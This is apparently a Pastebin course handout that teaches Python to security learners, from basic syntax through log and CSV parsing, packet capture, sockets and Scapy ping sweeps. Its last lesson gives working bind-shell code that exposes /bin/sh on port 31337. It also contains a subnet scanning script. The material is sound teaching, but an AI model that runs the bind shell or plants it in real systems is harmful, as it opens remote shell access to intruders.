Advertisement
joemccray

Python For InfoSec Professionals

Mar 31st, 2015
6,767
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 78.49 KB | None | 0 0
  1. #########################################
  2. # Here is the courseware for this month #
  3. #########################################
  4.  
  5. Class powerpoint slides:ar
  6. https://s3.amazonaws.com/infosecaddictsfiles/PythonV3-1.pptx
  7.  
  8.  
  9.  
  10. Courseware Lab Manual
  11. https://s3.amazonaws.com/infosecaddictsfiles/Python-For-InfoSec-Pros-2015.pdf
  12.  
  13.  
  14. Class Videos:
  15. https://s3.amazonaws.com/infosecaddictsvideos/2017-07-31+09.32+Python+for+InfoSec+Professionals.mp4
  16. https://s3.amazonaws.com/infosecaddictsvideos/2017-08-01+09.40+Python+for+InfoSec+Professionals.mp4
  17. https://s3.amazonaws.com/infosecaddictsvideos/2017-08-02+09.37+Python+for+InfoSec+Professionals.mp4
  18. https://s3.amazonaws.com/infosecaddictsvideos/2017-08-03+10.29+Python+for+InfoSec+Professionals.mp4
  19.  
  20.  
  21. Resource files:
  22. https://s3.amazonaws.com/infosecaddictsfiles/Python4SecurityPros-Files.zip
  23.  
  24.  
  25. https://s3.amazonaws.com/infosecaddictsvirtualmachines/StrategicsecUbuntu-v3.zip
  26. username: strategicsec
  27. password: strategicsec
  28.  
  29.  
  30. The youtube video playlist that I'd like for you to watch is located here:
  31. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA
  32.  
  33.  
  34. ####################
  35. # Installing Python#
  36. ####################
  37. Windows
  38. 32-Bit Version
  39. http://www.python.org/ftp/python/2.7.5/python-2.7.5.msi
  40.  
  41. 64-Bit Version
  42. http://www.python.org/ftp/python/2.7.5/python-2.7.5.amd64.msi
  43.  
  44. After you install Python in Windows the next thing you may want to install is IdleX:
  45. http://idlex.sourceforge.net/features.html
  46.  
  47.  
  48. Linux
  49. Debian/Ubuntu: sudo apt-get install -y python
  50. RHEL/CentOS/Fedora: sudo yum install -y python
  51.  
  52. After you install Python in Linux the next thing that you will need to do is install idle.
  53.  
  54. sudo apt-get install -y idle
  55.  
  56. Open IDLE, and let's just dive right in.
  57.  
  58.  
  59.  
  60.  
  61. #############################
  62. # Lesson 1: Simple Printing #
  63. #############################
  64.  
  65. >>> print "Today we are learning Python."
  66.  
  67.  
  68.  
  69.  
  70.  
  71.  
  72. #####################################
  73. # Lesson 2: Simple Numbers and Math #
  74. #####################################
  75.  
  76. >>> 2+2
  77.  
  78. >>> 6-3
  79.  
  80. >>> 18/7
  81.  
  82. >>> 18.0/7
  83.  
  84. >>> 18.0/7.0
  85.  
  86. >>> 18/7
  87.  
  88. >>> 9%4
  89.  
  90. >>> 8%4
  91.  
  92. >>> 8.75%.5
  93.  
  94. >>> 6.*7
  95.  
  96. >>> 6*6*6
  97.  
  98. >>> 6**3
  99.  
  100. >>> 5**12
  101.  
  102. >>> -5**4
  103.  
  104.  
  105.  
  106.  
  107.  
  108.  
  109. #######################
  110. # Lesson 3: Variables #
  111. #######################
  112.  
  113. >>> x=18
  114.  
  115. >>> x+15
  116.  
  117. >>> x**3
  118.  
  119. >>> y=54
  120.  
  121. >>> x+y
  122.  
  123. >>> g=input("Enter number here: ")
  124. 43
  125.  
  126. >>> g+32
  127.  
  128. >>> g**3
  129.  
  130.  
  131.  
  132.  
  133.  
  134.  
  135.  
  136.  
  137. ###################################
  138. # Lesson 4: Modules and Functions #
  139. ###################################
  140.  
  141. >>> 5**4
  142.  
  143. >>> pow(5,4)
  144.  
  145. >>> abs(-18)
  146.  
  147. >>> abs(5)
  148.  
  149. >>> floor(18.7)
  150.  
  151. >>> import math
  152.  
  153. >>> math.floor(18.7)
  154.  
  155. >>> math.sqrt(81)
  156.  
  157. >>> joe = math.sqrt
  158.  
  159. >>> joe(9)
  160.  
  161. >>> joe=math.floor
  162.  
  163. >>> joe(19.8)
  164.  
  165.  
  166.  
  167.  
  168.  
  169.  
  170.  
  171. ##################################
  172. # Lesson 5: How to Save Programs #
  173. ##################################
  174. Run "IDLE (Python GUI)"
  175.  
  176. File -> New Window
  177.  
  178. print "Python for InfoSec"
  179.  
  180. File -> Save as
  181. py4InfoSec.py
  182.  
  183. Run -> Run Module or Press "F5"
  184.  
  185.  
  186.  
  187.  
  188.  
  189. Create a file name.py
  190.  
  191. x = raw_input("Enter name: ")
  192. print "Hey " + x
  193. raw_input("Press<enter>")
  194.  
  195.  
  196. Run -> Run Module or Press "F5"
  197.  
  198.  
  199.  
  200.  
  201.  
  202.  
  203.  
  204.  
  205. #####################
  206. # Lesson 6: Strings #
  207. #####################
  208.  
  209. >>> "XSS"
  210.  
  211. >>> 'SQLi'
  212.  
  213. >>> "Joe's a python lover"
  214.  
  215. >>> 'Joe\'s a python lover'
  216.  
  217. >>> "Joe said \"InfoSec is fun\" to me"
  218.  
  219. >>> a = "Joe"
  220.  
  221. >>> b = "McCray"
  222.  
  223. >>> a, b
  224.  
  225. >>> a+b
  226.  
  227.  
  228.  
  229.  
  230.  
  231.  
  232.  
  233.  
  234. ##########################
  235. # Lesson 7: More Strings #
  236. ##########################
  237.  
  238. >>> num = 10
  239.  
  240. >>> num + 2
  241.  
  242. >>> "The number of open ports found on this system is " + num
  243.  
  244. >>> num = str(18)
  245.  
  246. >>> "There are " + num + " vulnerabilities found in this environment."
  247.  
  248. >>> num2 = 46
  249.  
  250. >>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
  251.  
  252.  
  253.  
  254.  
  255.  
  256.  
  257.  
  258.  
  259. #######################
  260. # Lesson 8: Raw Input #
  261. #######################
  262. Run "IDLE (Python GUI)"
  263.  
  264. File -> New Window
  265.  
  266. joemccray=input("Enter name: ")
  267. print joemccray
  268.  
  269.  
  270.  
  271. Run -> Run Module # Will throw an error
  272. or
  273. Press "F5"
  274.  
  275. File -> New Window
  276. joemccray=raw_input("Enter name: ")
  277.  
  278. Run -> Run Module # Will throw an error
  279.  
  280. or
  281.  
  282. Press "F5"
  283.  
  284. NOTE:
  285. Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
  286.  
  287.  
  288.  
  289.  
  290.  
  291.  
  292.  
  293. #################################
  294. # Lesson 9: Sequences and Lists #
  295. #################################
  296.  
  297. >>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
  298.  
  299. >>> attacks
  300. ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
  301.  
  302. >>> attacks[3]
  303. 'SQL Injection'
  304.  
  305. >>> attacks[-2]
  306. 'Cross-Site Scripting'
  307.  
  308.  
  309.  
  310.  
  311.  
  312.  
  313. ##########################
  314. # Level 10: If Statement #
  315. ##########################
  316. Run "IDLE (Python GUI)"
  317.  
  318. File -> New Window
  319. attack="SQLI"
  320. if attack=="SQLI":
  321. print 'The attacker is using SQLI'
  322.  
  323.  
  324.  
  325. Run -> Run Module or Press "F5"
  326.  
  327. File >> New Window
  328. attack="XSS"
  329. if attack=="SQLI":
  330. print 'The attacker is using SQLI'
  331.  
  332.  
  333. Run -> Run Module or Press "F5"
  334.  
  335.  
  336.  
  337. #############################
  338. # Reference Videos To Watch #
  339. #############################
  340. Here is your first set of youtube videos that I'd like for you to watch:
  341. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
  342.  
  343.  
  344.  
  345.  
  346.  
  347. ####################################
  348. # Lesson 11: Intro to Log Analysis #
  349. ####################################
  350.  
  351. Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:
  352.  
  353. https://s3.amazonaws.com/infosecaddictsvirtualmachines/StrategicsecUbuntu-v3.zip
  354. username: strategicsec
  355. password: strategicsec
  356.  
  357. Then execute the following commands:
  358. ---------------------------------------------------------------------------------------------------------
  359.  
  360. NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt.
  361.  
  362. wget http://pastebin.com/raw/85zZ5TZX
  363.  
  364. mv 85zZ5TZX access_log
  365.  
  366.  
  367. cat access_log | grep 141.101.80.188
  368.  
  369. cat access_log | grep 141.101.80.187
  370.  
  371. cat access_log | grep 108.162.216.204
  372.  
  373. cat access_log | grep 173.245.53.160
  374.  
  375. ---------------------------------------------------------
  376.  
  377. Google the following terms:
  378. - Python read file
  379. - Python read line
  380. - Python read from file
  381.  
  382.  
  383.  
  384.  
  385. ########################################################
  386. # Lesson 12: Use Python to read in a file line by line #
  387. ########################################################
  388.  
  389.  
  390. Reference:
  391. http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
  392.  
  393.  
  394.  
  395. ---------------------------------------------------------
  396. vi logread1.py
  397.  
  398.  
  399. ## Open the file with read only permit
  400. f = open('access_log', "r")
  401.  
  402. ## use readlines to read all lines in the file
  403. ## The variable "lines" is a list containing all lines
  404. lines = f.readlines()
  405.  
  406. print lines
  407.  
  408.  
  409. ## close the file after reading the lines.
  410. f.close()
  411.  
  412. ---------------------------------------------------------
  413.  
  414.  
  415. Google the following:
  416. - python difference between readlines and readline
  417. - python readlines and readline
  418.  
  419.  
  420.  
  421.  
  422.  
  423. ################################
  424. # Lesson 13: A quick challenge #
  425. ################################
  426.  
  427. Can you write an if/then statement that looks for this IP and print "Found it"?
  428.  
  429.  
  430. 141.101.81.187
  431.  
  432.  
  433.  
  434.  
  435.  
  436.  
  437. ---------------------------------------------------------
  438. Hint 1: Use Python to look for a value in a list
  439.  
  440. Reference:
  441. http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
  442.  
  443.  
  444.  
  445.  
  446. ---------------------------------------------------------
  447. Hint 2: Use Python to prompt for user input
  448.  
  449. Reference:
  450. http://www.cyberciti.biz/faq/python-raw_input-examples/
  451.  
  452.  
  453.  
  454.  
  455. ---------------------------------------------------------
  456. Hint 3: Use Python to search for a string in a list
  457.  
  458. Reference:
  459. http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
  460.  
  461.  
  462.  
  463.  
  464.  
  465. Here is my solution:
  466. -------------------
  467. $ python
  468. >>> f = open('access_log', "r")
  469. >>> lines = f.readlines()
  470. >>> ip = '141.101.81.187'
  471. >>> for string in lines:
  472. ... if ip in string:
  473. ... print(string)
  474.  
  475.  
  476.  
  477.  
  478. Here is one student's solution - can you please explain each line of this code to me?
  479. -------------------------------------------------------------------------------------
  480. #!/usr/bin/python
  481.  
  482. f = open('access_log')
  483.  
  484. strUsrinput = raw_input("Enter IP Address: ")
  485.  
  486. for line in iter(f):
  487. ip = line.split(" - ")[0]
  488. if ip == strUsrinput:
  489. print line
  490.  
  491. f.close()
  492.  
  493.  
  494.  
  495.  
  496. -------------------------------
  497.  
  498. Working with another student after class we came up with another solution:
  499.  
  500. #!/usr/bin/env python
  501.  
  502.  
  503. # This line opens the log file
  504. f=open('access_log',"r")
  505.  
  506. # This line takes each line in the log file and stores it as an element in the list
  507. lines = f.readlines()
  508.  
  509.  
  510. # This lines stores the IP that the user types as a var called userinput
  511. userinput = raw_input("Enter the IP you want to search for: ")
  512.  
  513.  
  514.  
  515. # This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
  516. for ip in lines:
  517. if ip.find(userinput) != -1:
  518. print ip
  519.  
  520.  
  521.  
  522. ##################################################
  523. # Lession 14: Look for web attacks in a log file #
  524. ##################################################
  525.  
  526. In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log.
  527. Supported attacks:
  528. 1. SQL Injection
  529. 2. Local File Inclusion
  530. 3. Remote File Inclusion
  531. 4. Cross-Site Scripting
  532.  
  533.  
  534.  
  535. wget https://s3.amazonaws.com/infosecaddictsfiles/scan_log.py
  536.  
  537. The usage for scan_log.py is simple. You feed it an apache log file.
  538.  
  539. cat scan_log.py | less (use your up/down arrow keys to look through the file)
  540.  
  541. Explain to me how this script works.
  542.  
  543.  
  544.  
  545. ################################
  546. # Lesson 15: Parsing CSV Files #
  547. ################################
  548.  
  549. Dealing with csv files
  550.  
  551. Reference:
  552. http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/
  553.  
  554. Type the following commands:
  555. ---------------------------------------------------------------------------------------------------------
  556.  
  557. wget https://s3.amazonaws.com/infosecaddictsfiles/class_nessus.csv
  558.  
  559.  
  560. Example 1 - Reading CSV files
  561. -----------------------------
  562. #To be able to read csv formated files, we will first have to import the
  563. #csv module.
  564.  
  565.  
  566. import csv
  567. with open('class_nessus.csv', 'rb') as f:
  568. reader = csv.reader(f)
  569. for row in reader:
  570. print row
  571.  
  572.  
  573.  
  574.  
  575.  
  576.  
  577. Example 2 - Reading CSV files
  578. -----------------------------
  579. vi readcsv.py
  580.  
  581.  
  582. #!/usr/bin/python
  583. import csv # imports the csv module
  584. import sys # imports the sys module
  585.  
  586. f = open(sys.argv[1], 'rb') # opens the csv file
  587. try:
  588. reader = csv.reader(f) # creates the reader object
  589. for row in reader: # iterates the rows of the file in orders
  590. print row # prints each row
  591. finally:
  592. f.close() # closing
  593.  
  594.  
  595.  
  596.  
  597.  
  598.  
  599. Example 3 - - Reading CSV files
  600. -------------------------------
  601. vi readcsv2.py
  602.  
  603.  
  604. #!/usr/bin/python
  605. # This program will then read it and displays its contents.
  606.  
  607.  
  608. import csv
  609.  
  610. ifile = open('class_nessus.csv', "rb")
  611. reader = csv.reader(ifile)
  612.  
  613. rownum = 0
  614. for row in reader:
  615. # Save header row.
  616. if rownum == 0:
  617. header = row
  618. else:
  619. colnum = 0
  620. for col in row:
  621. print '%-8s: %s' % (header[colnum], col)
  622. colnum += 1
  623.  
  624. rownum += 1
  625.  
  626. ifile.close()
  627.  
  628.  
  629.  
  630.  
  631.  
  632.  
  633.  
  634.  
  635. python readcsv2.py | less
  636.  
  637.  
  638.  
  639.  
  640.  
  641.  
  642.  
  643.  
  644. /---------------------------------------------------/
  645. --------------------PARSING CSV FILES----------------
  646. /---------------------------------------------------/
  647.  
  648. -------------TASK 1------------
  649. vi readcsv3.py
  650.  
  651. #!/usr/bin/python
  652. import csv
  653. f = open('class_nessus.csv', 'rb')
  654. try:
  655. rownum = 0
  656. reader = csv.reader(f)
  657. for row in reader:
  658. #Save header row.
  659. if rownum == 0:
  660. header = row
  661. else:
  662. colnum = 0
  663. if row[3].lower() == 'high':
  664. print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
  665. rownum += 1
  666. finally:
  667. f.close()
  668.  
  669.  
  670.  
  671.  
  672.  
  673. python readcsv3.py | less
  674.  
  675. -------------TASK 2------------
  676. vi readcsv4.py
  677.  
  678. #!/usr/bin/python
  679. import csv
  680. f = open('class_nessus.csv', 'rb')
  681. try:
  682. print '/---------------------------------------------------/'
  683. rownum = 0
  684. hosts = {}
  685. reader = csv.reader(f)
  686. for row in reader:
  687. # Save header row.
  688. if rownum == 0:
  689. header = row
  690. else:
  691. colnum = 0
  692. if row[3].lower() == 'high' and row[4] not in hosts:
  693. hosts[row[4]] = row[4]
  694. print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
  695. rownum += 1
  696. finally:
  697. f.close()
  698.  
  699.  
  700. python readcsv4.py | less
  701.  
  702.  
  703.  
  704.  
  705.  
  706.  
  707.  
  708.  
  709.  
  710.  
  711.  
  712.  
  713.  
  714.  
  715. #################################################
  716. # Lesson 16: Parsing Packets with Python's DPKT #
  717. #################################################
  718. The first thing that you will need to do is install dpkt.
  719.  
  720. sudo apt-get install -y python-dpkt
  721.  
  722.  
  723.  
  724.  
  725. Now cd to your courseware directory, and the cd into the subfolder '2-PCAP-Parsing/Resources'.
  726. Run tcpdump to capture a .pcap file that we will use for the next exercise
  727.  
  728.  
  729. sudo tcpdump -ni eth0 -s0 -w quick.pcap
  730.  
  731.  
  732. --open another command prompt--
  733. wget http://packetlife.net/media/library/12/tcpdump.pdf
  734.  
  735.  
  736. Let's do something simple:
  737.  
  738.  
  739. vi quickpcap.py
  740. --------------------------------------------------------
  741.  
  742. #!/usr/bin/python
  743. import dpkt;
  744.  
  745. # Simple script to read the timestamps in a pcap file
  746. # Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html
  747.  
  748. f = open("quick.pcap","rb")
  749. pcap = dpkt.pcap.Reader(f)
  750.  
  751. for ts, buf in pcap:
  752. print ts;
  753.  
  754. f.close();
  755.  
  756.  
  757. --------------------------------------------------------
  758.  
  759. Now let's run the script we just wrote
  760.  
  761.  
  762. python quickpcap.py
  763.  
  764.  
  765.  
  766.  
  767. How dpkt breaks down a packet:
  768.  
  769. Reference:
  770. http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html
  771.  
  772. src: the MAC address of SOURCE.
  773. dst: The MAC address of DESTINATION
  774. type: The protocol type of contained ethernet payload.
  775.  
  776. The allowed values are listed in the file "ethernet.py",
  777. such as:
  778. a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.
  779. b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.
  780.  
  781.  
  782. References:
  783. http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python
  784.  
  785.  
  786.  
  787.  
  788.  
  789.  
  790. Ok - now let's have a look at pcapparsing.py
  791.  
  792. sudo tcpdump -ni eth0 -s0 -w capture-100.pcap
  793.  
  794.  
  795. --open another command prompt--
  796. wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
  797.  
  798.  
  799.  
  800. Ok - now let's have a look at pcapparsing.py
  801. --------------------------------------------------------
  802.  
  803. import socket
  804. import dpkt
  805. import sys
  806. f = open('capture-100.pcap','r')
  807. pcapReader = dpkt.pcap.Reader(f)
  808.  
  809. for ts,data in pcapReader:
  810. ether = dpkt.ethernet.Ethernet(data)
  811. if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
  812. ip = ether.data
  813. tcp = ip.data
  814. src = socket.inet_ntoa(ip.src)
  815. srcport = tcp.sport
  816. dst = socket.inet_ntoa(ip.dst)
  817. dstport = tcp.dport
  818. print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)
  819.  
  820. f.close()
  821.  
  822. --------------------------------------------------------
  823.  
  824.  
  825.  
  826. OK - let's run it:
  827. python pcapparsing.py
  828.  
  829.  
  830.  
  831. running this script might throw an error like this:
  832.  
  833. Traceback (most recent call last):
  834. File "pcapparsing.py", line 9, in <module>
  835. if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
  836.  
  837.  
  838. If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something)
  839.  
  840.  
  841.  
  842.  
  843. Your homework for today...
  844.  
  845.  
  846. Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
  847.  
  848.  
  849.  
  850.  
  851.  
  852.  
  853. Your challenge is to fix the Traceback error
  854.  
  855.  
  856.  
  857.  
  858. #!/usr/bin/python
  859.  
  860. import pcapy
  861. import dpkt
  862. import sys
  863. import socket
  864. import struct
  865.  
  866. SINGLE_SHOT = False
  867.  
  868. # list all the network devices
  869. pcapy.findalldevs()
  870.  
  871. iface = "eth0"
  872. filter = "arp"
  873. max_bytes = 1024
  874. promiscuous = False
  875. read_timeout = 100 # in milliseconds
  876.  
  877. pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout )
  878. pc.setfilter( filter )
  879.  
  880. # callback for received packets
  881. def recv_pkts( hdr, data ):
  882. packet = dpkt.ethernet.Ethernet( data )
  883.  
  884. print type( packet.data )
  885. print "ipsrc: %s, ipdst: %s" %( \
  886. socket.inet_ntoa( packet.data.spa ), \
  887. socket.inet_ntoa( packet.data.tpa ) )
  888.  
  889. print "macsrc: %s, macdst: %s " % (
  890. "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha),
  891. "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) )
  892.  
  893. if SINGLE_SHOT:
  894. header, data = pc.next()
  895. sys.exit(0)
  896. else:
  897. packet_limit = -1 # infinite
  898. pc.loop( packet_limit, recv_pkts ) # capture packets
  899.  
  900.  
  901.  
  902.  
  903.  
  904.  
  905.  
  906.  
  907. #############################
  908. # Reference Videos To Watch #
  909. #############################
  910. Here is your second set of youtube videos that I'd like for you to watch:
  911. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20)
  912.  
  913.  
  914.  
  915.  
  916. #############################################
  917. # Lesson 17: Python Sockets & Port Scanning #
  918. #############################################
  919.  
  920.  
  921. $ ncat -l -v -p 1234
  922.  
  923.  
  924.  
  925.  
  926. --open another terminal--
  927. python
  928.  
  929. >>> import socket
  930. >>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  931. >>> s.connect(('localhost', 1234))
  932. >>> s.send('Hello, world')
  933. >>> data = s.recv(1024)
  934. >>> s.close()
  935.  
  936. >>> print 'Received', data
  937.  
  938.  
  939.  
  940.  
  941.  
  942.  
  943. ########################################
  944. # Lesson 18: TCP Client and TCP Server #
  945. ########################################
  946.  
  947. vi tcpclient.py
  948.  
  949.  
  950.  
  951. #!/usr/bin/python
  952. # tcpclient.py
  953.  
  954. import socket
  955.  
  956. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  957. hostport = ("127.0.0.1", 1337)
  958. s.connect(hostport)
  959. s.send("Hello\n")
  960. buf = s.recv(1024)
  961. print "Received", buf
  962.  
  963.  
  964.  
  965.  
  966.  
  967.  
  968.  
  969.  
  970.  
  971. vi tcpserver.py
  972.  
  973.  
  974.  
  975.  
  976.  
  977. #!/usr/bin/python
  978. # tcpserver.py
  979.  
  980. import socket
  981.  
  982. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  983. hostport = ("", 1337)
  984. s.bind(hostport)
  985. s.listen(10)
  986. while 1:
  987. cli,addr = s.accept()
  988. print "Connection from", addr
  989. buf = cli.recv(1024)
  990. print "Received", buf
  991. if buf == "Hello\n":
  992. cli.send("Server ID 1\n")
  993. cli.close()
  994.  
  995.  
  996.  
  997.  
  998.  
  999.  
  1000.  
  1001.  
  1002. python tcpserver.py
  1003.  
  1004.  
  1005. --open another terminal--
  1006. python tcpclient.py
  1007.  
  1008.  
  1009. ########################################
  1010. # Lesson 19: UDP Client and UDP Server #
  1011. ########################################
  1012.  
  1013. vi udpclient.py
  1014.  
  1015.  
  1016.  
  1017.  
  1018.  
  1019.  
  1020. #!/usr/bin/python
  1021. # udpclient.py
  1022.  
  1023. import socket
  1024.  
  1025. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  1026. hostport = ("127.0.0.1", 1337)
  1027. s.sendto("Hello\n", hostport)
  1028. buf = s.recv(1024)
  1029. print buf
  1030.  
  1031.  
  1032.  
  1033.  
  1034.  
  1035.  
  1036.  
  1037.  
  1038.  
  1039. vi udpserver.py
  1040.  
  1041.  
  1042.  
  1043.  
  1044.  
  1045.  
  1046. #!/usr/bin/python
  1047. # udpserver.py
  1048.  
  1049. import socket
  1050.  
  1051. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  1052. hostport = ("127.0.0.1", 1337)
  1053. s.bind(hostport)
  1054. while 1:
  1055. buf, address = s.recvfrom(1024)
  1056. print buf
  1057. if buf == "Hello\n":
  1058. s.sendto("Server ID 1\n", address)
  1059.  
  1060.  
  1061.  
  1062.  
  1063.  
  1064.  
  1065. python udpserver.py
  1066.  
  1067.  
  1068. --open another terminal--
  1069. python udpclient.py
  1070.  
  1071.  
  1072.  
  1073.  
  1074.  
  1075.  
  1076. ###############################
  1077. # Lesson 20: Installing Scapy #
  1078. ###############################
  1079.  
  1080. sudo apt-get update
  1081. sudo apt-get install python-scapy python-pyx python-gnuplot
  1082.  
  1083.  
  1084. Reference Page For All Of The Commands We Will Be Running:
  1085. http://samsclass.info/124/proj11/proj17-scapy.html
  1086.  
  1087. Great slides for Scapy:
  1088. http://www.secdev.org/conf/scapy_csw05.pdf
  1089.  
  1090.  
  1091.  
  1092.  
  1093. To run Scapy interactively
  1094.  
  1095. sudo scapy
  1096.  
  1097.  
  1098.  
  1099. ################################################
  1100. # Lesson 21: Sending ICMPv4 Packets with scapy #
  1101. ################################################
  1102.  
  1103. In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:
  1104.  
  1105. i = IP()
  1106.  
  1107.  
  1108.  
  1109.  
  1110. This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
  1111.  
  1112. i.display()
  1113.  
  1114.  
  1115.  
  1116.  
  1117. Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
  1118.  
  1119. i.dst="10.65.75.49"
  1120.  
  1121. i.display()
  1122.  
  1123.  
  1124.  
  1125.  
  1126. Notice that scapy automatically fills in your machine's source IP address.
  1127.  
  1128. Use these commands to create an object named ic of type ICMP and display its properties:
  1129.  
  1130.  
  1131. ic = ICMP()
  1132.  
  1133. ic.display()
  1134.  
  1135.  
  1136.  
  1137.  
  1138.  
  1139. Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
  1140.  
  1141. sr1(i/ic)
  1142.  
  1143.  
  1144.  
  1145.  
  1146.  
  1147. This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply.
  1148.  
  1149. The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.
  1150.  
  1151. Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):
  1152.  
  1153.  
  1154. sr1(i/ic/"YOUR NAME")
  1155.  
  1156.  
  1157. You should see a reply with a Raw section containing your name.
  1158.  
  1159.  
  1160.  
  1161. ##############################################
  1162. # Lesson 22: Sending a UDP Packet with Scapy #
  1163. ##############################################
  1164.  
  1165.  
  1166. Preparing the Target
  1167. $ ncat -ulvp 4444
  1168.  
  1169.  
  1170.  
  1171.  
  1172. --open another terminal--
  1173. In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:
  1174.  
  1175. u = UDP()
  1176.  
  1177. u.display()
  1178.  
  1179.  
  1180.  
  1181. This creates an object named u of type UDP, and displays its properties.
  1182.  
  1183. Execute these commands to change the destination port to 4444 and display the properties again:
  1184.  
  1185. i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
  1186.  
  1187. u.dport = 4444
  1188.  
  1189. u.display()
  1190.  
  1191.  
  1192.  
  1193. Execute this command to send the packet to the Windows machine:
  1194.  
  1195. send(i/u/"YOUR NAME SENT VIA UDP\n")
  1196.  
  1197.  
  1198.  
  1199. On the Windows target, you should see the message appear
  1200.  
  1201.  
  1202.  
  1203.  
  1204. #######################################
  1205. # Lesson 23: Ping Sweeping with Scapy #
  1206. #######################################
  1207.  
  1208.  
  1209.  
  1210. #!/usr/bin/python
  1211. from scapy.all import *
  1212.  
  1213. TIMEOUT = 2
  1214. conf.verb = 0
  1215. for ip in range(0, 256):
  1216. packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
  1217. # You will need to change 10.10.30 above this line to the subnet for your network
  1218. reply = sr1(packet, timeout=TIMEOUT)
  1219. if not (reply is None):
  1220. print reply.dst, "is online"
  1221. else:
  1222. print "Timeout waiting for %s" % packet[IP].dst
  1223.  
  1224.  
  1225.  
  1226. ###############################################
  1227. # Checking out some scapy based port scanners #
  1228. ###############################################
  1229.  
  1230. wget https://s3.amazonaws.com/infosecaddictsfiles/rdp_scan.py
  1231.  
  1232. cat rdp_scan.py
  1233.  
  1234. sudo python rdp_scan.py
  1235.  
  1236.  
  1237. ######################################
  1238. # Dealing with conf.verb=0 NameError #
  1239. ######################################
  1240.  
  1241. conf.verb = 0
  1242. NameError: name 'conf' is not defined
  1243.  
  1244. Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:
  1245.  
  1246. from scapy import *
  1247. to
  1248. from scapy.all import *
  1249.  
  1250.  
  1251.  
  1252. Reference:
  1253. http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html
  1254.  
  1255.  
  1256. conf.verb=0 is a verbosity setting (configuration/verbosity = conv
  1257.  
  1258.  
  1259.  
  1260. Here are some good Scapy references:
  1261. http://www.secdev.org/projects/scapy/doc/index.html
  1262. http://resources.infosecinstitute.com/port-scanning-using-scapy/
  1263. http://www.hackerzvoice.net/ouah/blackmagic.txt
  1264. http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html
  1265.  
  1266.  
  1267. ######################################
  1268. # Lesson 24: Bind and Reverse Shells #
  1269. ######################################
  1270. vi simplebindshell.py
  1271.  
  1272.  
  1273. #!/bin/python
  1274. import os,sys,socket
  1275.  
  1276. ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
  1277. print '-Creating socket..'
  1278. port = 31337
  1279. try:
  1280. ls.bind(('', port))
  1281. print '-Binding the port on '
  1282. ls.listen(1)
  1283. print '-Listening, '
  1284. (conn, addr) = ls.accept()
  1285. print '-Waiting for connection...'
  1286. cli= conn.fileno()
  1287. print '-Redirecting shell...'
  1288. os.dup2(cli, 0)
  1289. print 'In, '
  1290. os.dup2(cli, 1)
  1291. print 'Out, '
  1292. os.dup2(cli, 2)
  1293. print 'Err'
  1294. print 'Done!'
  1295. arg0='/bin/sh'
  1296. arg1='-a'
  1297. args=[arg0]+[arg1]
  1298. os.execv(arg0, args)
  1299. except(socket.error):
  1300. print 'fail\n'
  1301. conn.close()
  1302. sys.exit(1)
  1303.  
  1304.  
  1305.  
  1306.  
